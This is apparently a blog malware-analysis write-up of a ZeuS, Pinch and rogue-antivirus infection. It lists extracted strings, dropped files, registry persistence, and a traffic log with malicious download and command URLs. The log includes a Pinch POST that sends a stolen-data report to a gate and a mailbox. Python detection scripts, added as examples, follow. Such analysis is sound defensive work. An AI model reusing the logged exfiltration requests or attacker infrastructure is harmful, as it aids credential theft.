Welcome to the jungle: Zeus + Pinch + Rogue Software

This second part of our analysis, which follows part 1, will show what the files we collected did once they were run live. From the main loader we can extract the following useful strings:

msxslt3.exe
MsXSLT
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
\ntdll.dll
wininet.dll
Content-Type: application/x-www-form-urlencoded
POST
tmpf
\msxslt.dat
Google Bot
explorer.exe
__SYSTEM32_MSXSLT_
svchost.exe
\\.\pipe\_SYSTEM_MSXML_RUN_
ftpdata=1&user=%s&pass=%s&host=%s
SeDebugPrivilege

We can see various references to a file named msxslt3.exe, and we can notice that it will be added to the registry startup key Run under the value MsXSLT. The malware will send data out to an external website using the POST method, and there is also a reference to “Google Bot”, which is probably the user agent the malware will use for the POST request.

The string “__SYSTEM32_MSXSLT_” should be the name of the mutex created to ensure that only a single instance of the malware runs on the infected system. The two process names “explorer.exe” and “svchost.exe” are the processes the malware will inject code into. Finally, we can see an interesting string:

ftpdata=1&user=%s&pass=%s&host=%s

From the above string we can assume the malware will send data to an FTP server (ftpdata=1), passing three variables: the username, the password and the hostname.

From the other unpacked file, we can extract following data:

wget 3.0
Click here to protect your computer from spyware!
Application cannot be executed. The file is infected. Please activate your antivirus software.
WARNING
Advanced Virus Remover installed.
SETUP
winupdate.exe
\Internet Explorer\iexplore.exe 
%s\IS15.exe
hxxp://buyinternetsecurity-2010.com/buy/?code=%s
hxxp://buyinternetsecurity-2010.com/?code=%s
C:\Program Files\InternetSecurity2010\IS2010.exe
AcroRd32.exe
rstrui.exe
CloneCD.exe
cmd.exe
digitaleditions.exe
freecell.exe
FullTiltPoker.exe
GOM.exe
hrtzzm.exe
Icq.exe
Illustrator.exe
miranda32.exe
control.exe
notepad.exe
calc.exe
Attention! System detected a potential hazard (TrojanSPM/LX) on your computer that may infect executable files. You private information and PC safety is at risk. To get rid of unwanted spyware and keep your computer safe you need update your current security software. Click OK to download official intrusion detection system (IDS software)
WARNING
%s\%d.exe
hxxp://testavrdown.com/cgi-bin/get.pl?l=%s
hxxp://vs-codec-pro.net/form.php?code=%s
Windows can`t play the folowing media formats: AVI;WMV;AVS;FLV;MKV;MOV;3GP;MP4;MPG;MPEG;MP3;AAC;WAV;WMA;CDA;FLAC;M4A;MID. Update your video and sound codec to resolve this issue.
Fatal Error
regsvr32 /s %s
%s\helper32.dll
hxxp://downloadavr25.com/dfghfghgfj.dll
hxxp://downloadavr25.com/cgi-bin/download.pl?code=%s
hxxp://downloadavr25.com/loads.php?code=%s
%s\warning.html
Spyware Alert!
winlogon32.exe
smss32.exe
Software\Microsoft\Windows\CurrentVersion\Run
%s%s
%s\winlogon32.exe
%s\smss32.exe
NoActiveDesktopChanges
NoChangingWallpaper
Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop
NoSetActiveDesktop
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
DisableTaskMgr
Software\Microsoft\Windows\CurrentVersion\Policies\System
Software\IS2010
Software\AVR
Software\RealAV
Userinit
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
userinit.exe
Software\AntivirusXP
faa56ae0-fc64-41fc-b286-fed9abcd401e
Software
8636065b-fef0-4255-b14f-54639f7900a4

From the data above we can see that the file in question is the executable of the rogue security software named IS2010.exe (Internet Security 2010). This rogue installs files in system directories, hijacks the registry to disable the task manager and other important features, hijacks the execution of pre-defined processes or files (such as regedit.exe or movie files), and shows fake security warnings when a user runs one of those processes or tries to watch a movie. The alerts generated when a user tries to open a “blacklisted” process or to play a movie are the following:

Application cannot be executed. The file is infected. Please activate your antivirus software.
Windows can`t play the folowing media formats: AVI;WMV;AVS;FLV;MKV;MOV;3GP;MP4;MPG;MPEG;MP3;AAC;WAV;WMA;CDA;FLAC;M4A;MID. Update your video and sound codec to resolve this issue.

Fake alert in action:

Screenshot

We can also see all the text used in the fake security warnings shown by this rogue. The user agent the malware uses to query the malicious website downloadavr25(dot)com is “wget 3.0”; if we query the website with a different user agent, the website should deny the request.

Interestingly, we can also see references to registry keys and files that are not related to Internet Security 2010 but to other rogue security software:

Software\AVR
Software\RealAV
Software\AntivirusXP

We also noticed some very interesting data inside the unpacked executable that looks like obfuscated JavaScript code:

Screenshot

The content of the above obfuscated JavaScript code is copied by the malware into the file warning.html, which is placed in the system32 folder.

When the main loader is executed, it creates the following files:

C:\DOCUME~1\user\LOCALS~1\Temp\teste1_p.exe
C:\DOCUME~1\user\LOCALS~1\Temp\q1.exe
C:\DOCUME~1\user\LOCALS~1\Temp\avto.exe
C:\DOCUME~1\user\LOCALS~1\Temp\6_ldry3.exe
C:\DOCUME~1\user\LOCALS~1\Temp\5_odbn0.exe
C:\DOCUME~1\user\LOCALS~1\Temp\4_pinnew.exe
C:\DOCUME~1\user\LOCALS~1\Temp\2_load.exe
C:\DOCUME~1\user\LOCALS~1\Temp\0_11adwara.exe
C:\WINDOWS\system32\sdra64.exe
C:\DOCUME~1\user\LOCALS~1\Temp\60325cahp25ca0.exe
C:\WINDOWS\system32\lowsec
C:\WINDOWS\system32\lowsec\local.ds
C:\WINDOWS\system32\lowsec\user.ds
C:\WINDOWS\system32\smss32.exe
C:\WINDOWS\system32\winlogon32.exe
C:\WINDOWS\svc.exe
C:\WINDOWS\odbn0.exe
C:\WINDOWS\system32\helper32.dll
C:\WINDOWS\system32\IS15.exe
C:\DOCUME~1\user\LOCALS~1\Temp\60325cahp25ca2.exe
C:\WINDOWS\system32\41.exe
C:\DOCUME~1\user\LOCALS~1\Temp\60325cahp25ca1.exe
C:\DOCUME~1\user\LOCALS~1\Temp\60325cahp25caa.exe
C:\WINDOWS\lsass.exe
C:\Program Files\InternetSecurity2010
C:\DOCUME~1\user\LOCALS~1\Application Data\Microsoft\Internet Explorer\MSIMGSIZ.DAT
C:\Program Files\InternetSecurity2010\IS2010.exe
C:\DOCUME~1\user\Desktop\Internet Security 2010.lnk
C:\DOCUME~1\user\Start Menu\Internet Security 2010.lnk
C:\DOCUME~1\user\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Security 2010.lnk
C:\DOCUME~1\user\user\Start Menu\Internet Security 2010.lnk
C:\DOCUME~1\user\Start Menu\Internet Security 2010.lnk
C:\DOCUME~1\user\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Security 2010.lnk
C:\WINDOWS\system32\18467.exe

Note that all the above files were created within 24 hours of the first run of the main loader. The loader adds most of the newly created executables to the registry startup keys so that all the malicious files are started every time Windows boots.

We can see a screenshot of malicious running processes:

Screenshot

This is a screenshot of all created files:

Screenshot

From the files that have been created we can see that the loader installs a lot of malicious components: in particular the famous ZeuS Trojan (sdra64.exe), the rogue security software Internet Security 2010 (IS2010.exe), BHOs (helper32.dll), the famous Pinch Trojan (4_pinnew.exe) and other very dangerous trojans in the Temp folder.

We also noticed various ring3 API hooks installed by sdra64.exe and other executables, which hide their presence on the system by hiding the files from regular Explorer searches and from all other file searches made by user-mode applications. The files are also hidden from the task manager, since the Zeus process sdra64.exe is hidden too.

The infected system is now exposed to a very high risk of sensitive data theft and of being used as a fraudulent base to host malicious files or to launch attacks such as DDoS or malware spreading on popular P2P platforms like eMule and torrents. In particular, what puts the computer at such a high risk of data theft are the two famous trojans used mainly to steal bank accounts, credit card details and identities, and to log everything typed on the keyboard:

  • Zeus Trojan
  • Pinch Trojan

After the hidden execution of the rogue security software Internet Security 2010, the system became very unstable. Most executables generally used to analyze the system, such as regedit.exe and taskmgr.exe, could not be started:

Screenshot

A very simple and quick workaround to be able to run regedit.exe and taskmgr.exe is to copy the files under C:\ and rename them, respectively:

C:\regedit.exe -> C:\r.exe
C:\taskmgr.exe -> C:\t.exe

Screenshot

Now it is possible to inspect the registry with r.exe (regedit) and check running processes with t.exe (taskmgr). Many other executables belonging to freeware and commercial applications of any kind, from security software to video conversion software, could not be started either, and when the user tries to run a “blacklisted” process the rogue software shows aggressive fake security warnings stating that the file is infected.

From these images we can clearly see the rogue security software Internet Security 2010 in action during a fake system scan and when it displays the fake security warnings stating that the system is infected by a huge number of trojans (even if in this case it is true, LOL):

Screenshot

Screenshot

Screenshot

This is part of the network traffic logged during the malware infection:

GET /lightbox/js/r/files/tasks/AC HTTP/1.1
Host: sexzoznamka.eu
 
GET /lightbox/js/r/robo.php?r=1 HTTP/1.1
Host: sexzoznamka.eu
 
GET /cgi-bin/download.pl?code=0000093 HTTP/1.1
User-Agent: wget 3.0
Host: downloadavr30.com
 
GET /dfghfghgfj.dll HTTP/1.1
User-Agent: wget 3.0
Host: downloadavr30.com
 
GET /loads.php?code=0000093 HTTP/1.1
User-Agent: wget 3.0
Host: downloadavr30.com
 
GET /lightbox/js/r/robo.php?r=4 HTTP/1.1
Host: sexzoznamka.eu
 
GET /cgi-bin/get.pl?l=0000093 HTTP/1.1
User-Agent: wget 3.0
Host: testavrdown.com
 
UDP:53 -> autouploaders.net
UDP:53 -> sruprekut.net
UDP:53 -> greatinstant.net
 
GET /mass/tds2.php HTTP/1.1
Host: autouploaders.net
 
GET /123.exe HTTP/1.1
Host: plugininput.com
 
GET /nop/tds2.php HTTP/1.1
Host: saloongins.net
 
GET /in.cgi?16 HTTP/1.1
Host: promotds.com
 
GET /pi.php HTTP/1.1
Host: kingsizematures.com
 
GET / HTTP/1.1
Host: interno-porn.com
 
GET /pi.php HTTP/1.1
Host: interno-porn.com
 
GET /lightbox/js/r/robo.php?r=5 HTTP/1.1
Host: sexzoznamka.eu
 
POST /gate/gate.php HTTP/1.0
Host: moretds.in
Content-Length: 1612
a=vaska_1@123mail.ru&b=pinch3_report&d=report.bin&c=xxx
 
GET /out.php?t=3.0.2.231&url=xxx=&s=3 HTTP/1.1
Host: interno-porn.com
 
GET / HTTP/1.1
Host: www.nasty-xx.net
 
GET /js2/33311.php?view=h HTTP/1.1
Host: pages.etology.com
 
GET /transformer/v4/ads2.js HTTP/1.1
Host: media.etology.com
 
GET /search.php?qq=xxx HTTP/1.1
Host: getgreatguide.in
 
GET /s/exx.php HTTP/1.1
Host: getgreatguide.in

From the above traffic we can see that the malware uses the domain

GET /lightbox/js/r/robo.php?r=1 HTTP/1.1
Host: sexzoznamka.eu

to launch commands; in fact we can see that the number:

robo.php?r=1

changes based on the traffic received or sent, so we presume it changes every time a specific action has finished, and by changing the number a new action associated with that number is started.

We can see various domains used to spread the TDSS trojan:

GET /mass/tds2.php HTTP/1.1
GET /123.exe HTTP/1.1
GET /nop/tds2.php HTTP/1.1

We can also see that a domain is used to receive the report containing all the sensitive data stolen from the infected computer; the data is then sent to a specific email address:

POST /gate/gate.php HTTP/1.0
Host: moretds.in
Content-Length: 1612
a=vaska_1@123mail.ru&b=pinch3_report&d=report.bin&c=xxx

The above data can identify the traffic generated by the Pinch trojan.

We can also see the domain from which the malware downloaded the files related to the rogue software Internet Security 2010:

GET /loads.php?code=0000093 HTTP/1.1
User-Agent: wget 3.0
Host: downloadavr30.com
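The three traffic patterns identified above (the robo.php?r=N command beacon, the forged wget 3.0 user agent, and the Pinch gate.php report) can be matched automatically over a request log in this layout. This is an added example, not code from the original post; the sample requests are constructed from the entries quoted above and the finding tag names are assumptions.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed sample in the layout of the logged traffic above:
# request line, headers, and (for the POST) a blank line plus the form body.
SAMPLE_REQUESTS = [
    "GET /lightbox/js/r/robo.php?r=1 HTTP/1.1\nHost: sexzoznamka.eu",
    "GET /loads.php?code=0000093 HTTP/1.1\nUser-Agent: wget 3.0\nHost: downloadavr30.com",
    "GET /lightbox/js/r/robo.php?r=4 HTTP/1.1\nHost: sexzoznamka.eu",
    "POST /gate/gate.php HTTP/1.0\nHost: moretds.in\nContent-Length: 1612\n\n"
    "a=vaska_1@123mail.ru&b=pinch3_report&d=report.bin&c=xxx",
    "GET /transformer/v4/ads2.js HTTP/1.1\nHost: media.etology.com",
]

def parse_request(raw):
    """Split one logged request into method, target, lower-cased headers and body."""
    head, _, body = raw.partition("\n\n")
    lines = head.split("\n")
    method, target, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}

def classify(req):
    """Return (tag, detail) findings for one parsed request; tag names are assumed."""
    findings = []
    url = urlsplit(req["target"])
    query = parse_qs(url.query)
    # 1. robo.php?r=N: the number is the action id that changes per stage
    if url.path.endswith("/robo.php") and "r" in query:
        findings.append(("command_beacon", "r=" + query["r"][0]))
    # 2. forged "wget 3.0" user agent used to fetch the rogue AV components
    if req["headers"].get("user-agent") == "wget 3.0":
        findings.append(("rogue_av_download", url.path))
    # 3. Pinch report upload: form body with b=pinch3_report and a mailbox in a=
    form = parse_qs(req["body"]) if req["method"] == "POST" else {}
    if form.get("b") == ["pinch3_report"]:
        findings.append(("pinch_report", form["a"][0] + " " + form.get("d", ["?"])[0]))
    return findings

def triage(raw_requests):
    """Group findings by Host header, dropping requests that matched nothing."""
    report = {}
    for raw in raw_requests:
        req = parse_request(raw)
        hits = classify(req)
        if hits:
            report.setdefault(req["headers"].get("host", "?"), []).extend(hits)
    return report
```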

We scanned the infected computer with Hijack Hunter; below are all the malware traces extracted from the log file:

[+] Running processes
 
C:\DOCUME~1\user\LOCALS~1\teste1_p.exe (354304 bytes) (Unknown) (f49588f405759025573272186038ffc5)
C:\DOCUME~1\user\LOCALS~1\q1.exe (293888 bytes) (Unknown) (811805ec29c6f3e0e479e0e8bad9dbff)
C:\WINDOWS\system32\smss32.exe (18944 bytes) (Unknown) (3aa2b2dbb73cebcb67f6e0ef2ce313d1)
C:\Program Files\InternetSecurity2010\IS2010.exe (1117184 bytes) (Internet Security) (d86468b427a31d2c6348256f7a1a03a7)
C:\DOCUME~1\user\LOCALS~1\5_odbn0.exe (295424 bytes) (Unknown) (c70ba51397f3ef815589cd4917699b15)
C:\Program Files\InternetSecurity2010\IS2010.exe (1117184 bytes) (Internet Security) (d86468b427a31d2c6348256f7a1a03a7)
 
[+] Registry startups
 
Value: smss32.exe
Data: C:\WINDOWS\system32\smss32.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 
Value: netc
Data: C:\WINDOWS\svc.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 
Value: odbny0
Data: C:\WINDOWS\odbn0.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 
Value: lsass
Data: C:\WINDOWS\lsass.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 
Value: Internet Security 2010
Data: C:\Program Files\InternetSecurity2010\IS2010.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 
Value: Userinit
Data: C:\WINDOWS\system32\winlogon32.exe,C:\WINDOWS\system32\sdra64.exe,
Key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
 
[+] Windows Firewall allowed programs
 
Value: C:\DOCUME~1\user\LOCALS~1\4_pinnew.exe
Data: C:\DOCUME~1\user\LOCALS~1\4_pinnew.exe:*:Enabled:Enabled
Key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
 
[+] Windows Hijacks
 
Value: DisableTaskMgr
Data: 1
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
 
Value: NoChangingWallpaper
Data: 1
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop
 
Value: NoChangingWallpaper
Data: 1
Key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop
 
[+] Executables in Temp folders
 
C:\DOCUME~1\user\LOCALS~1\0_11adwara.exe (18944 bytes) (Unknown) (3aa2b2dbb73cebcb67f6e0ef2ce313d1)
C:\DOCUME~1\user\LOCALS~1\4_pinnew.exe (44032 bytes) (Unknown) (4b4440b36ec91d2ca8084735760109fd)
C:\DOCUME~1\user\LOCALS~1\5_odbn0.exe (295424 bytes) (Unknown) (c70ba51397f3ef815589cd4917699b15)
C:\DOCUME~1\user\LOCALS~1\60325cahp25caa.exe (2661888 bytes) (Unknown) (6411876d41f55fa21003afe9256b24d2)
C:\DOCUME~1\user\LOCALS~1\6_ldry3.exe (84992 bytes) (Unknown) (180ef4d8f204fdd201909f06ed174a8b)
C:\DOCUME~1\user\LOCALS~1\avto.exe (295936 bytes) (Unknown) (a66bbd3944586e428029533e3ce80d60)
C:\DOCUME~1\user\LOCALS~1\q1.exe (293888 bytes) (Unknown) (811805ec29c6f3e0e479e0e8bad9dbff)
C:\DOCUME~1\user\LOCALS~1\teste1_p.exe (354304 bytes) (Unknown) (f49588f405759025573272186038ffc5)
 
[+] TCP Connections
 
smss32.exe -> 127.0.0.1:1042 -> 193.104.153.30:80 -> CLOSE_WAIT
q1.exe -> 127.0.0.1:1050 -> 89.248.172.136:80 -> ESTABLISHED
q1.exe -> 127.0.0.1:1052 -> 89.248.168.69:80 -> ESTABLISHED
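As an added example (not part of the original post or of the Hijack Hunter tool), the checks this log suggests can be automated: Userinit entries other than userinit.exe, autostarts with system-process lookalike names, and enabled lockdown policies. The log excerpt is constructed in the layout shown above; the finding tag names are assumptions.

```python
SAMPLE_LOG = r"""[+] Registry startups
Value: smss32.exe
Data: C:\WINDOWS\system32\smss32.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value: Userinit
Data: C:\WINDOWS\system32\winlogon32.exe,C:\WINDOWS\system32\sdra64.exe,
Key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
[+] Windows Hijacks
Value: DisableTaskMgr
Data: 1
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
"""  # constructed excerpt in the Hijack Hunter layout shown above

def parse_entries(text):
    """Return [(section, {Value, Data, Key})]; the Key line closes each entry."""
    section, entry, out = None, {}, []
    for line in text.splitlines():
        field, sep, value = line.strip().partition(":")
        if line.startswith("[+] "):
            section = line[4:].strip()
        elif sep and field in ("Value", "Data", "Key"):
            entry[field] = value.strip()
            if field == "Key":  # last field of every entry
                out, entry = out + [(section, entry)], {}
    return out

def lookalike(path):
    """Real system name plus digits (smss32.exe), or the real name outside system32."""
    p = path.lower().replace("/", "\\")
    stem = p.rsplit("\\", 1)[-1].rsplit(".", 1)[0]
    for s in ("smss", "winlogon", "lsass", "svchost"):  # stems the droppers imitate
        if stem == s:
            return "\\" in p and "\\system32\\" not in p
        if stem.startswith(s) and stem[len(s):].isdigit():
            return True
    return False

def find_hijacks(text):
    """Flag Userinit tampering, lookalike autostarts and enabled lockdown policies."""
    findings = []
    for section, e in parse_entries(text):
        value, data, key = e.get("Value", ""), e.get("Data", ""), e.get("Key", "")
        if value == "Userinit":  # a clean value holds only ...\userinit.exe,
            findings += [("userinit_hijack", p) for p in data.split(",")
                         if p and not p.lower().endswith("\\userinit.exe")]
        elif section == "Registry startups" and lookalike(data):
            findings.append(("lookalike_autostart", data))
        elif section == "Windows Hijacks" and data == "1":
            findings.append(("policy_" + value, key))
    return findings
```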
